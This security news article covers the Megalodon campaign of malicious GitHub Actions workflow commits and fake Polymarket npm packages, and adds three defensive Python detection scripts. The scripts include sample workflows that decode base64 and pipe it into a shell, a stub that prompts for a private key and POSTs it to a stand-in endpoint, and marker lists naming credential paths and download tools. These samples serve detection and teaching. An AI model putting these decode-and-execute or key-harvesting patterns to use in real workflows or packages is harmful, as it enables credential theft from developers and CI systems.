Supply chain attacks used to be about poisoning a single popular package and waiting. That era is over. On May 18, 2026, an attacker pushed 5,718 malicious commits to 5,561 distinct GitHub repositories in a six-hour window — between 11:36 a.m. and 5:48 p.m. UTC — using throwaway accounts and forged author identities like build-bot, auto-ci, ci-bot, and pipeline-bot. The campaign, dubbed Megalodon by SafeDep researchers, didn’t bother with the slow burn of a typosquat. It went straight for the CI/CD pipeline, and it should make every engineering lead reconsider what “trusted commit” actually means.
How Megalodon Weaponizes GitHub Actions Against You
According to SafeDep’s report, the Megalodon operator injected GitHub Actions workflow files containing base64-encoded bash payloads that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at 216.126.225[.]129:8443. The loot list: AWS credentials, Google Cloud access tokens, Azure IMDS data, SSH private keys, Docker and Kubernetes configurations, Vault tokens, Terraform credentials, shell history, .env files, credentials.json, service-account.json, GITHUB_TOKEN, GitLab and Bitbucket tokens, and matches against more than 30 secret regex patterns.
CI/CD runners are the soft underbelly of modern engineering. They hold the keys to production, they auto-execute code from pull requests, and most teams treat their workflow YAML like infrastructure plumbing nobody audits. If you’re a startup running a typical GitHub Actions pipeline, a single merged PR with a backdoored workflow file gives an attacker the credentials to your AWS account, your container registry, and your customer database — all in the time it takes the runner to spin up. Expect compliance auditors to start asking for workflow-file change logs the same way they ask for production access logs today.
Why the Two-Payload Strategy Signals a More Patient Attacker
SafeDep documented two variants: SysDiag, a mass-spread payload that triggers on every push and pull request, and Optimize-Build, a targeted variant that activates only on workflow_dispatch — GitHub’s manual on-demand trigger. The @tiledesk/tiledesk-server package was hit with the targeted variant, meaning the malware sits dormant in CI/CD runners until the attacker decides to pull the trigger. As SafeDep put it, “With 5,700+ repos compromised, even a small fraction yielding a usable GITHUB_TOKEN gives the attacker enough targets for on-demand triggering.”
The operational discipline here is what should worry defenders. The attacker traded reach for stealth. Imagine your team uses Tiledesk in a customer-facing chatbot — the npm install is clean, your scanners report nothing, and the backdoor only fires when the attacker decides your CI environment is worth raiding. That’s not a worm anymore. That’s a botnet of build pipelines waiting for commands. The next 12 months will see at least one major breach traced back to a workflow_dispatch payload that sat undetected for weeks. Teams running AI automation pipelines that touch production data are particularly exposed, because their CI runners often hold the broadest credential scope in the entire org.
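Both traits described in the last few paragraphs, the decode-and-execute step in the injected workflow files and the dormant workflow_dispatch-only trigger profile, can be triaged from the raw YAML without ever running the workflow. The script below is an added example written for this article, not SafeDep's tooling and not a published detection signature: the shell markers, the 40-character base64 threshold, the sample workflows and the harmless stand-in payload (it only lists credential paths and sends nothing) are all constructed assumptions.

```python
"""Static triage of GitHub Actions workflow files for the two traits the
Megalodon variants share: a base64 blob decoded and piped into a shell, and a
trigger profile separating the mass-spread variant (every push/pull_request)
from the dormant one (workflow_dispatch only). Works on raw YAML text, so no
PyYAML is needed. The workflows below are constructed samples."""
import base64
import re

# Fragments a decoded payload would plausibly contain: an assumption for this
# example, not a published detection signature.
SHELL_MARKERS = ("#!/bin/bash", "#!/bin/sh", "curl ", "wget ", "~/.aws", ".ssh/id_", "GITHUB_TOKEN")
# "... | base64 -d | bash" and its --decode / sh / eval variants.
DECODE_EXEC_RE = re.compile(r"base64\s+(?:-d|--decode)\b.*?\|\s*(?:bash|sh|eval)\b", re.S)
# Standalone base64 runs of 40+ characters; shorter ones are rarely payloads.
B64_LITERAL_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{40,}={0,2}")
KNOWN_EVENTS = {"push", "pull_request", "pull_request_target", "workflow_dispatch",
                "schedule", "release", "workflow_run", "issue_comment"}


def triggers(text):
    """Return the set of event names under the top-level `on:` key."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^on:\s*(.*)$", line)
        if not m:
            continue
        inline = m.group(1).strip()
        if inline:                      # on: push   or   on: [push, pull_request]
            return set(re.findall(r"[a-z_]+", inline)) & KNOWN_EVENTS
        found = set()                   # block form: one indented key per event
        for nxt in lines[i + 1:]:
            if not nxt.strip():
                continue
            if not nxt.startswith((" ", "\t")):
                break                   # back at column 0: the on: block is over
            key = re.match(r"^\s+([a-z_]+):", nxt)
            if key and key.group(1) in KNOWN_EVENTS:
                found.add(key.group(1))
        return found
    return set()


def decoded_payloads(text):
    """Decode every long base64 literal and keep the ones that read like shell."""
    hits = []
    for blob in B64_LITERAL_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                    # commit SHAs and similar noise land here
        if any(marker in decoded for marker in SHELL_MARKERS):
            hits.append(decoded)
    return hits


def triage(text):
    events = triggers(text)
    if events and events <= {"workflow_dispatch"}:
        profile = "dormant-on-demand"           # Optimize-Build style
    elif events & {"push", "pull_request", "pull_request_target"}:
        profile = "fires-on-every-change"       # SysDiag style
    else:
        profile = "other"
    return {"triggers": sorted(events), "profile": profile,
            "decode_and_exec": bool(DECODE_EXEC_RE.search(text)),
            "payloads": decoded_payloads(text)}


# Constructed stand-in payload: it only lists credential paths and sends nothing.
PAYLOAD = "#!/bin/bash\nls -la ~/.aws ~/.ssh/id_* 2>/dev/null\n"
BLOB = base64.b64encode(PAYLOAD.encode()).decode()

MASS_SPREAD_WF = f"""name: SysDiag
on:
  push:
  pull_request:
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - run: echo "{BLOB}" | base64 -d | bash
"""
DORMANT_WF = f"""name: Optimize-Build
on: workflow_dispatch
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo {BLOB} | base64 --decode | sh
"""
BENIGN_WF = """name: CI
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""
```

Run `triage()` over every file under .github/workflows/ in a suspect commit: a decode-and-exec step that fires on push and pull_request matches the SysDiag shape, while the same step behind workflow_dispatch alone is the dormant Optimize-Build profile that no runtime monitor will see until the attacker dispatches it. Decoding the blob rather than merely flagging it matters because long base64 literals also occur legitimately (embedded certificates, pinned digests), and those drop out at the marker check.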
The TeamPCP Connection and Why npm’s Token Reset Isn’t Enough
OX Security’s Moshe Siman Tov Bustan tied Megalodon to a broader wave, noting that “TeamPCP compromising GitHub was only the beginning” — a group that has also hit TanStack, Grafana Labs, OpenAI, and Mistral AI, partnered with BreachForums, LAPSUS$, and VECT, and deployed wiper malware against machines geolocated in Iran and Israel. In response to TeamPCP and the related Mini Shai-Hulud worm, npm invalidated all granular access tokens with write access that bypassed 2FA, and is pushing maintainers toward Trusted Publishing.
Socket’s analysis is blunt: “By burning every bypass-2FA token on the platform, npm cuts off the credentials the worm has already collected. Maintainers issue new ones. The worm, still active in the wild, goes back to harvesting them. The reset buys breathing room. It does not close the underlying hole.” If you maintain a published npm package, you should already be migrating to Trusted Publishing — not next quarter, this sprint. The token-rotation treadmill is a losing game when the attacker’s harvesting infrastructure is still live. Healthcare and fintech teams that ship through npm — including those building compliance-sensitive healthcare software — face the worst exposure, because their CI environments often include PHI-adjacent credentials that can’t be rotated without service downtime.
The Polymarket Imposters and the Social Engineering Layer
While Megalodon backdoors legitimate packages, a separate campaign tracked by SafeDep shows the other side of the supply chain knife. A throwaway account named polymarketdev published nine malicious npm packages impersonating Polymarket trading CLI tools — including polymarket-claude-code, polymarket-ai-agent, and polymarket-trader — all within a 30-second window. A postinstall script displays a fake wallet onboarding prompt asking users to paste their private key, claiming “it stays encrypted,” then POSTs the raw key in plaintext to a Cloudflare Worker.
The attacker built a functional CLI around the theft operation, complete with a credible GitHub repo. If you’re a developer evaluating crypto trading tools and you npm install polymarket-trader, you’d see a clean-looking onboarding flow that mimics legitimate wallet UX. This is supply chain attack as UX design. The lesson for engineering teams: install-time scripts deserve the same scrutiny as production code, and any package asking for a private key during install should be treated as hostile by default. Apply the same logic you’d use to evaluate trust boundaries in a blockchain versus traditional database decision — assume zero trust until the data path is proven.
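The install-time review that paragraph calls for can be mechanised before `npm install` ever runs: unpack the tarball with `npm pack`, read package.json for lifecycle hooks, and inspect whatever those hooks execute. The Python below is an added example, not code from the article or from any package it names; the package.json, the onboarding script (reduced to the strings a scanner keys on, not a working prompt) and the regex heuristics are all constructed for illustration.

```python
"""Pre-install audit of an npm package's contents: which lifecycle hooks does it
register, and does the script a hook points at prompt for secrets or send data
off-host? Meant to run on the files extracted from `npm pack` before any
`npm install`. The package.json and script below are constructed to mirror the
onboarding-prompt behaviour described in the article; they are not the real
polymarketdev packages."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns; assumptions for this example, not a vendor signature set.
SUSPICIOUS = {
    "asks for a private key or seed": re.compile(r"private\s*key|seed\s*phrase|mnemonic", re.I),
    "reads interactive input": re.compile(r"readline|prompt\(|process\.stdin"),
    "makes an outbound HTTP request": re.compile(r"\bfetch\(|https?\.request|axios\.|https://"),
    "targets a Cloudflare Worker": re.compile(r"workers\.dev"),
}


def install_hooks(package_json):
    """Lifecycle scripts that npm runs automatically during install."""
    scripts = json.loads(package_json).get("scripts", {})
    return {hook: scripts[hook] for hook in LIFECYCLE_HOOKS if hook in scripts}


def audit_package(package_json, files):
    """`files` maps tarball path -> source text. Returns hooks, findings, verdict."""
    hooks = install_hooks(package_json)
    findings = []
    for hook, cmd in hooks.items():
        sources = {"<inline>": cmd}          # the hook command itself may be inline shell
        for token in cmd.split():            # resolve 'node ./scripts/x.js' to a tarball file
            path = token[2:] if token.startswith("./") else token
            if path in files:
                sources[path] = files[path]
        for path, src in sources.items():
            for label, pattern in SUSPICIOUS.items():
                if pattern.search(src):
                    findings.append((hook, path, label))
    labels = {label for _, _, label in findings}
    if "asks for a private key or seed" in labels and "makes an outbound HTTP request" in labels:
        verdict = "hostile"          # the Polymarket shape: prompt for a key, then POST it
    elif hooks:
        verdict = "review"           # install-time code exists; read it line by line
    else:
        verdict = "clean"            # nothing runs at install time
    return {"hooks": hooks, "findings": findings, "verdict": verdict}


# Constructed imposter: only the strings a scanner keys on, not a working prompt.
IMPOSTER_PACKAGE_JSON = json.dumps({
    "name": "example-trader-cli",
    "version": "1.0.0",
    "scripts": {"postinstall": "node ./scripts/onboard.js", "test": "jest"},
})
IMPOSTER_FILES = {
    "scripts/onboard.js": (
        "// constructed stand-in for the fake wallet onboarding flow\n"
        "const question = 'Paste your wallet private key (it stays encrypted): ';\n"
        "const endpoint = 'https://example.workers.dev/onboard';\n"
        "// ... readline prompt, then fetch(endpoint, {method: 'POST', body: key}) ...\n"
    ),
}
CLEAN_PACKAGE_JSON = json.dumps({"name": "example-lib", "version": "2.3.1",
                                 "scripts": {"build": "tsc", "test": "jest"}})

if __name__ == "__main__":
    print(audit_package(IMPOSTER_PACKAGE_JSON, IMPOSTER_FILES))
    print(audit_package(CLEAN_PACKAGE_JSON, {}))
```

A "hostile" verdict is exactly the pattern the article describes: an install hook, a prompt for a private key, and an outbound POST in the same script. A "review" verdict means install-time code exists even though none of the patterns fired, which is the case to pair with `npm install --ignore-scripts` in CI so that nothing executes before someone has read it.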
FAQ
Q: What is the Megalodon GitHub attack?
A: Megalodon is an automated campaign disclosed by SafeDep in which an attacker pushed 5,718 malicious commits to 5,561 GitHub repositories on May 18, 2026. The commits injected GitHub Actions workflow files with base64-encoded bash payloads designed to exfiltrate CI secrets, cloud credentials, SSH keys, and OIDC tokens to a C2 server.
Q: How do I check if my repository was hit by Megalodon?
A: Review your recent commit history for commits authored by build-bot, auto-ci, ci-bot, or pipeline-bot, or by GitHub accounts with random 8-character usernames. Audit any new or modified .github/workflows/ files for base64-encoded bash, and check for outbound connections to 216.126.225[.]129:8443.
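To run the three checks in that answer over a repository, here is an added Python example (written for this article, not SafeDep's or GitHub's tooling): it parses the output of `git log --format='%h|%an|%ae' --name-only`, flags the forged author names from the report, throwaway-looking 8-character noreply logins and any change under .github/workflows/, and filters a runner's connection log for the reported C2 endpoint. The git log excerpt and the connection lines are constructed samples; the 8-character login rule is a heuristic and will produce false positives on short legitimate usernames, which is why it is reported alongside the other indicators rather than on its own.

```python
"""Triage of recent repository history and CI egress for the Megalodon
indicators in the FAQ: commits authored as build-bot / auto-ci / ci-bot /
pipeline-bot or by throwaway 8-character GitHub accounts, changes under
.github/workflows/, and connections to the reported C2 endpoint. Works over
the text of `git log --format='%h|%an|%ae' --name-only`; the log and the
connection lines below are constructed samples."""
import re

FORGED_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}   # from the report
THROWAWAY_LOGIN_RE = re.compile(r"^[a-z0-9]{8}$")   # heuristic; expect false positives
WORKFLOW_DIR = ".github/workflows/"
C2_ENDPOINT = "216.126.225.129:8443"                # IoC from the report (defanged above)
COMMIT_HEADER_RE = re.compile(r"^[0-9a-f]{7,40}\|")


def parse_log(text):
    """Group `%h|%an|%ae` header lines with the file paths that follow them."""
    commits, current = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if COMMIT_HEADER_RE.match(line):
            sha, name, email = line.split("|", 2)
            current = {"sha": sha, "name": name, "email": email, "files": []}
            commits.append(current)
        elif current is not None:
            current["files"].append(line.strip())
    return commits


def github_login(email):
    """Login part of a GitHub noreply address (ID+login@users.noreply.github.com)."""
    m = re.match(r"^(?:\d+\+)?([^@]+)@users\.noreply\.github\.com$", email)
    return m.group(1) if m else None


def audit(commits):
    """Return [(sha, [reasons])] for every commit matching at least one indicator."""
    findings = []
    for c in commits:
        reasons = []
        if c["name"] in FORGED_AUTHORS:
            reasons.append("forged bot author name " + c["name"])
        login = github_login(c["email"])
        if login and THROWAWAY_LOGIN_RE.match(login):
            reasons.append("throwaway-looking login " + login)
        workflow_files = [f for f in c["files"] if f.startswith(WORKFLOW_DIR)]
        if workflow_files:
            reasons.append("touches " + ", ".join(workflow_files))
        if reasons:
            findings.append((c["sha"], reasons))
    return findings


def egress_hits(conn_lines):
    """Lines from a runner's connection log that reach the reported C2."""
    return [line for line in conn_lines if C2_ENDPOINT in line]


# Constructed sample of `git log --format='%h|%an|%ae' --name-only` output.
SAMPLE_LOG = """\
a1b2c3d|build-bot|build-bot@users.noreply.github.com
.github/workflows/sysdiag.yml

e4f5a6b|Jane Doe|jane@example.com
src/app.js
test/app.test.js

c7d8e9f|Chris|12345678+x9k2q7pw@users.noreply.github.com
.github/workflows/optimize-build.yml
README.md

0a1b2c3|Jane Doe|jane@example.com
.github/workflows/ci.yml
"""

# Constructed connection-log lines in a "proto src -> dst:port" layout.
SAMPLE_CONNS = [
    "tcp 10.1.0.7:41022 -> 140.82.112.3:443",        # a github.com-range address, expected
    "tcp 10.1.0.7:41023 -> 216.126.225.129:8443",    # the C2 endpoint from the report
]

if __name__ == "__main__":
    for sha, reasons in audit(parse_log(SAMPLE_LOG)):
        print(sha, "; ".join(reasons))
    print(egress_hits(SAMPLE_CONNS))
```

The last sample commit is flagged only because it touches a workflow file under a legitimate author, which is intended: every .github/workflows/ change is worth a look in this window, and a review queue that surfaces them is cheaper than missing the one signed by a real maintainer whose token was harvested.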
Q: What is Trusted Publishing and why is npm pushing it?
A: Trusted Publishing lets package maintainers publish to npm using short-lived OIDC tokens from their CI provider instead of long-lived access tokens. npm is urging migration because the Mini Shai-Hulud worm and TeamPCP campaigns have shown that any long-lived token — even one with 2FA — can be harvested and abused once attackers reach a CI runner.
Key Takeaways
- Audit every .github/workflows/ change as a security-sensitive event; workflow YAML is now production code and deserves CODEOWNERS protection on par with auth modules.
- Migrate npm publishing from long-lived tokens to Trusted Publishing this sprint — token rotation is reactive defense against an active harvesting operation.
- Assume any CI runner credential is one merged PR away from exfiltration; scope IAM roles to the minimum the build actually needs and prefer OIDC federation over static keys.
- Treat workflow_dispatch triggers as a privileged code path; require manual review of any workflow that runs only on manual dispatch, since attackers are using it for operational stealth.
- Block postinstall scripts by default in CI (npm install --ignore-scripts) and review them line by line in local dev — the Polymarket campaign shows that install-time code is now a primary attack surface for credential theft.